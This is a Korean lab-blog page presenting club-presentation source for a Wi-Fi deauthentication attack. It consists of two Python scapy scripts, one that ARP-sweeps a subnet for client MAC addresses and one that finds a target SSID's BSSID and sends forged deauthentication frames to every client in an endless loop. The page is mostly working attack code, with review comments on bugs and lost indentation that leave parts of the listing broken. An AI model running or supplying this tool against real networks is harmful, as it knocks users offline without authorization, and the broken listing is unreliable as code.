cdor1's lab
DeAuth packet attack
동아리 발표 소스이다.
강력한 패킷 관련 라이브러리인 scapy 모듈을 사용했다.
[*] up.py - ARP 패킷을 활용해 online인 호스트와 offline인 호스트를 구분
#!/usr/bin/python
from scapy.all import *
import sys
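# ANSI SGR escape sequences used to colour the console output of this script.
r = '\033[31m'  # red
b = '\033[34m'  # blue
g = '\033[32m'  # green
y = '\033[33m'  # yellow
m = '\033[35m'  # magenta (the listing had 34 here, which is the code for blue)
c = '\033[36m'  # cyan
w = '\033[0m'   # reset all attributes; used to end a coloured span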
# Seconds start_scan() waits for a reply to each ARP probe.
Timeout = 1
# Shared module-level list of MAC addresses; start_scan() appends to it and returns it.
macTable = list()
# scapy global configuration: default interface wlan0, verbosity 0.
conf.iface = "wlan0"
conf.verb = 0
def get_mac(ip_address):
    """Return the source MAC of the first ARP reply for *ip_address*.

    A broadcast ARP request for ip_address is sent with srp() using
    timeout=2 and retry=10. The Ethernet source address of the first
    answer is returned as a string; None is returned when nothing answers.
    """
    arp_request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address)
    answered, _unanswered = srp(arp_request, timeout=2, retry=10)
    # Only the first (sent, received) pair is ever used.
    for _sent, reply in answered:
        return reply.sprintf(r"%Ether.src%")
    return None
def start_scan(ip):
    """ARP-probe ip + "0" .. ip + "254" and collect the MACs of hosts that answer.

    *ip* is a dotted prefix that ends with a dot (the usage text in ap.py
    gives "192.168.1." as an example). Every address gets one broadcast ARP
    request with a wait of ``Timeout`` seconds. Answering hosts are printed
    and their MAC is appended to the module-level ``macTable``, which is
    also the return value.

    Each probe is a broadcast who-has from this host, so the sweep is
    visible to anything on the segment that monitors ARP traffic.
    """
    for host_index in range(255):
        target = ip + str(host_index)
        answered, unanswered = srp(
            Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=target),
            timeout=Timeout,
        )
        if len(answered) > 0:
            # NOTE(review): get_mac() sends its own ARP request each time it
            # is called (twice here) and returns None when nothing answers,
            # in which case the string concatenation below raises TypeError.
            print(y + "[*] IP: " + target + "\n[*] MAC: " + get_mac(target) + w)
            macTable.append(get_mac(target))
        elif len(unanswered) > 0:
            # Same text the two-item print statement produced: the items are
            # separated by a single space.
            print(r + unanswered[0].getlayer(ARP).pdst + " " + " is down" + w)
    print(y + "[*] Open: " + str(macTable) + w)
    return macTable
[*] ap.py - DeAuth attack 수행
#!/usr/bin/env python
from scapy.all import *
from up import *
from time import *
import sys
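# ANSI SGR escape sequences used to colour the console output of this script.
r = '\033[31m'  # red
b = '\033[34m'  # blue
g = '\033[32m'  # green
y = '\033[33m'  # yellow
m = '\033[35m'  # magenta (the listing had 34 here, which is the code for blue)
c = '\033[36m'  # cyan
w = '\033[0m'   # reset all attributes; used to end a coloured span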
# Parallel lists filled by PacketHandler: ap_list[i] is the addr2 of a beacon
# and ap_name[i] is the info field taken from the same frame.
ap_list, ap_name = [], []
# Placeholder; later reassigned to the list returned by start_scan().
ban = []
# Flag for the beacon-sniffing loop; decremented once the requested SSID is found.
check = 1
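def mode(mode, iface):
    """Switch wireless interface *iface* to *mode* with ifconfig/iwconfig.

    The interface is taken down, its mode is set, and it is brought up
    again, each step through sudo.

    The commands are run as argument vectors rather than shell strings.
    The caller passes sys.argv[1] as *iface*; with the previous
    os.system() string concatenation, shell metacharacters in that value
    would have been interpreted by the shell and run under sudo.

    Args:
        mode: iwconfig mode name (the script passes "monitor").
        iface: name of the wireless interface.

    Exit statuses are not checked, matching the earlier behaviour.
    """
    import subprocess  # local import so the file's import block stays untouched

    commands = (
        ["sudo", "ifconfig", iface, "down"],
        ["sudo", "iwconfig", iface, "mode", mode],
        ["sudo", "ifconfig", iface, "up"],
    )
    for argv in commands:
        # No shell is involved, so iface/mode are always single arguments.
        subprocess.call(argv)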
def PacketHandler(pkt):
    """sniff() callback: remember every beacon sender not seen before.

    For an 802.11 frame with type 0 and subtype 8 (a management beacon)
    whose addr2 is not yet in ``ap_list``, addr2 is appended to ``ap_list``
    and the frame's info field to ``ap_name``, and both are printed.
    """
    if not pkt.haslayer(Dot11):
        return
    is_beacon = pkt.type == 0 and pkt.subtype == 8
    if not is_beacon:
        return
    sender = pkt.addr2
    if sender in ap_list:
        return
    ap_list.append(sender)
    ap_name.append(pkt.info)
    # NOTE(review): pkt.info is taken straight from a received frame and is
    # written to the terminal unfiltered; treat it as untrusted input.
    print(m + "[*] AP MAC: %s with SSID: %s " % (pkt.addr2, pkt.info) + w)
# Exactly three operands are required after the script name:
# interface, address prefix for start_scan(), and the SSID to look for.
if not len(sys.argv) == 4:
    print("Usage: sudo python2 " + sys.argv[0] + " (Managed mode connected)interface ip ssid")
    print("Example: sudo python2 " + sys.argv[0] + " wlan0 192.168.1. cdor1")
    sys.exit(1)

# Use the given interface for scapy, run the ARP sweep while the interface
# is still in its normal mode, then switch the interface to monitor mode.
conf.iface = sys.argv[1]
print(m + "[*] SCAN WIFI..." + w)
ban = start_scan(sys.argv[2])
mode("monitor", sys.argv[1])
# NOTE(review): the indentation of this listing was lost when the page was
# published, so the nesting of the lines below (in particular whether the two
# prints run per sniffed frame or once after the loop) cannot be recovered
# from the text alone. The statements are left exactly as shown.
# Sniff one frame at a time, with PacketHandler recording beacons, for as
# long as check is non-zero.
while check:
sniff(iface=sys.argv[1], prn = PacketHandler, count=1)
# Search the parallel ap_name/ap_list lists for the SSID given as sys.argv[3]
# and keep the matching entry of ap_list as bssid.
for i in range(len(ap_name)):
if ap_name[i] == sys.argv[3]:
bssid = ap_list[i]
# check starts at 1, so one decrement ends the while loop.
check -= 1
print(y + str(ap_name) + w)
print(y + str(ap_list) + w)
# NOTE(review): the indentation of this listing was lost when the page was
# published; the nesting of the statements below cannot be recovered from the
# text alone, so they are left exactly as shown.
# NOTE(review): get_if_addr() is scapy's lookup for an interface's IPv4
# address, while ban holds the MAC strings returned by start_scan(); the
# "myMac != ban[i]" comparison below therefore looks like it is always true
# and the else branch unreachable - confirm.
myMac = get_if_addr(sys.argv[1])
print(c + "[*] START WIFI DEAUTH ATTACK: " + str(len(ban)) + " CLIENT!")
# Endless loop over the MACs collected by the ARP sweep. Each frame built
# below is an 802.11 management frame (type 0) of subtype 12
# (deauthentication), addressed to the client (addr1) with bssid as addr2 and
# addr3, and reason code 7 (class 3 frame received from a non-associated
# station).
# Deauthentication frames are not authenticated unless 802.11w Protected
# Management Frames is in use, which is why a forged sender is accepted;
# repeated bursts such as range(10) per client are the pattern that wireless
# IDS deauth-flood rules count.
while 1:
for i in range(len(ban)):
if myMac != ban[i]:
for count in range(10):
packet = RadioTap()/Dot11(type=0,subtype=12,addr1=ban[i],addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
sendp(packet, iface=sys.argv[1])
sleep(0.1)
print(g + "[*] ATTACK CILENT: " + ban[i] + w)
else:
print(g + "[*] MY MAC!!!" + w)